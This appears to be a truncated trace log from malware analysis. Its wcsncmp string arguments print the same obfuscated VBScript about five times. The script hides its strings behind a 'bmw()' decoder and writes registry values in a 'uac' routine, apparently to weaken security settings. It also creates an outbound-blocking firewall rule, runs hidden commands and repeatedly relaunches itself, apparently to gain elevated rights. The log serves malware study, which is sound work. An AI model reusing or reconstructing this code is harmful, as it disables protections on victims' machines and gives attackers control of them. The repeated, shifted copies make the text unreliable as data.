bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.379] wcsncmp (_String1="tocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.379] wcsncmp (_String1="ocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.379] wcsncmp (_String1="col = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.379] wcsncmp (_String1="ol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.379] wcsncmp (_String1="l = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 